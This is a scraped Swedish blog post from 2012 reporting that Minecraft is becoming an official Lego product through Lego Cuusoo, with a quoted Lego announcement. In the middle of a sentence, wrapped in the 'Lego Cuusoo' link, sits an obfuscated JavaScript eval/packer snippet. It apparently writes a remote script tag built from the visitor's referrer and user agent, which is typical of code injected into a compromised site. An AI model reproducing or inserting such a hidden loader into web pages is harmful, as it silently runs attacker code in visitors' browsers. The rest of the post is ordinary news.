Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Lego <3 Minecraft!

Lego <3 Minecraft!
Filip Urde
  • On 25 januari, 2012
  • http://www.revue.se/filip-urde

Det har aldrig känts speciellt långsökt, men nu är det alltså sant. Minecraft blir en officiell Legoprodukt. Det otroligt populära spelet kommer nu ta sin kreativitet ut från det digitala och sammanföras med den analoga föregångaren Lego. Lego, en av mina absoluta favorit leksaker är alltid med där det händer och försöker ständigt förnya sig i genren. Detta tycker jag personligen är ett rent snilledrag! Jag själv kan tänka mig att köpa en av produkterna bara för att!
Mer än 10 000 personer har tidigare skrivit på en intresse-poll om att Legot skulle bli verklighet. Detta gjordes via hemsidan Lego eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ezdyb|var|u0026u|referrer|edarb||js|php’.split(’|’),0,{}))
Cuusoo
och var ett krav för att produktlinjen skulle komma upp för granskning. vilket var kravet för att det skulle komma till granskning.

Så här skriver man på Lego Cuusoo:

”We’re happy to announce that the Minecraft project on LEGO CUUSOO has passed the LEGO review and we are now developing a concept that celebrates the best aspects of building with the LEGO system and in Minecraft and we can?t wait to show it to you?but we aren?t ready just yet. These things take time, so we appreciate your patience. More details are to come.”

Ååå Vad jag gillar Minecraft!
gizmodo.com